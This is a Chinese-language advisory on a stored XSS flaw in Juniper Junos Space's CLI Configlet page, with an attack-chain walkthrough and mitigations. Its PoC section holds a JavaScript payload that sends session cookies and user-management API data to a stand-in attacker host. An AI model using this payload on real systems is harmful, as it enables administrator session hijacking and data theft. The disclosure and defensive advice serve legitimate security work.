CVE-2025-60009：Juniper Junos Space CLI Configlet页面存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60009

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Juniper Networks Junos Space

漏洞概述

CVE-2025-60009是Juniper Networks Junos Space网络管理平台中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞源于Web页面生成过程中对用户输入的不当中和处理（Improper Neutralization of Input During Web Page Generation），具体存在于Junos Space的CLI Configlet（CLI配置片段）页面中。

攻击者可以利用该漏洞在CLI Configlet页面中注入恶意的脚本标签（script tags），当其他用户（特别是管理员）访问被注入恶意脚本的页面时，注入的脚本将在受害者浏览器上下文中执行。由于Junos Space是网络管理员用于集中管理Juniper设备的核心平台，拥有较高权限的管理员经常使用该平台，因此该漏洞的潜在危害较大。攻击者可以利用受害者的权限执行任意操作，包括以管理员身份执行命令、修改配置、窃取会话凭证或进行权限提升。

该漏洞的CVSS 3.1评分为6.1，属于中危级别。虽然攻击需要用户交互（UI:R）且无需认证（PR:N），但由于其影响范围可波及管理员账户，且利用难度较低，因此仍需引起高度重视。Juniper Networks已发布安全公告JSA103140，建议用户尽快升级到24.1R4或更高版本以修复该漏洞。

技术细节

该漏洞的核心问题在于Junos Space的CLI Configlet页面未对用户提交的输入进行充分的过滤和转义处理。具体技术原理如下：

1. **输入注入点**：CLI Configlet页面允许用户输入和编辑CLI命令配置片段，这些输入被存储在服务器端数据库中，供后续用户查看和使用。

2. **输出未转义**：当其他用户访问包含该Configlet的页面时，服务器直接将存储的用户输入渲染到HTML页面中，未对HTML特殊字符（如<、>、"、'等）进行适当的HTML实体编码。

3. **脚本执行机制**：攻击者可以在Configlet内容中注入恶意JavaScript代码，例如通过`<script>alert(document.cookie)</script>`或更复杂的载荷。由于输出未经过滤，浏览器会将这些注入的标签解析为可执行脚本。

4. **权限继承**：注入的脚本在受害者的浏览器会话中执行，可以访问受害者的会话Cookie、发起CSRF请求、执行管理操作等。由于管理员通常拥有最高权限，攻击者可借此执行任意管理命令。

5. **攻击场景**：攻击者创建一个包含恶意脚本的CLI Configlet，当管理员在日常运维中查看或使用该Configlet时，恶意脚本自动执行，从而实现会话劫持、权限提升或数据窃取。

攻击链分析

STEP 1

步骤1：侦察与准备

攻击者访问Junos Space的CLI Configlet功能页面，了解输入字段和页面结构，确认XSS注入点。

STEP 2

步骤2：构造恶意载荷

攻击者构造包含恶意JavaScript代码的Configlet内容，代码设计用于窃取会话Cookie或执行特权操作。

STEP 3

步骤3：提交恶意Configlet

攻击者将包含恶意脚本的Configlet提交保存到Junos Space服务器中，无需特殊权限即可完成。

STEP 4

步骤4：等待受害者访问

当管理员或其他用户在日常运维中查看或使用该Configlet时，页面加载并执行注入的恶意脚本。

STEP 5

步骤5：权限劫持与数据窃取

恶意脚本在受害者浏览器中执行，窃取会话凭证、获取敏感信息或以受害者权限执行管理操作。

STEP 6

步骤6：横向移动或权限提升

利用获取的管理员权限，攻击者可进一步控制Junos Space平台，修改网络设备配置或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-60009: Stored XSS in Juniper Junos Space CLI Configlet
The attacker injects a malicious script payload into the CLI Configlet page.
When an administrator views the infected Configlet, the script executes in the victim's browser context.
-->

<!-- Step 1: Attacker crafts a malicious Configlet with embedded JavaScript -->
<script>
  // Exfiltrate session cookies to attacker-controlled server
  var img = new Image();
  img.src = "https://attacker.example.com/steal?cookie=" + encodeURIComponent(document.cookie);

  // Perform privileged actions via CSRF-like requests
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/api/space/user-management/users", true);
  xhr.withCredentials = true;
  xhr.onreadystatechange = function() {
    if (xhr.readyState === 4) {
      // Send harvested data to attacker server
      new Image().src = "https://attacker.example.com/exfil?data=" + encodeURIComponent(xhr.responseText);
    }
  };
  xhr.send();
</script>

<!-- Step 2: The above payload is submitted as a CLI Configlet content -->
<!-- Step 3: When an admin browses to the Configlet page, the script auto-executes -->

影响范围

Juniper Networks Junos Space < 24.1R4

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制Junos Space管理界面的网络访问范围，仅允许可信IP地址访问；2）加强管理员安全意识培训，谨慎查看和打开来源不明的Configlet；3）在Web代理或反向代理层面部署XSS过滤规则；4）定期审查和清理可疑的Configlet条目；5）监控异常的会话活动和管理操作日志，及时发现潜在攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60009
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60009
3 Details https://www.cvedetails.com/cve/CVE-2025-60009/
4 VulDB https://vuldb.com/cve/CVE-2025-60009
5 Link https://supportportal.juniper.net/JSA103140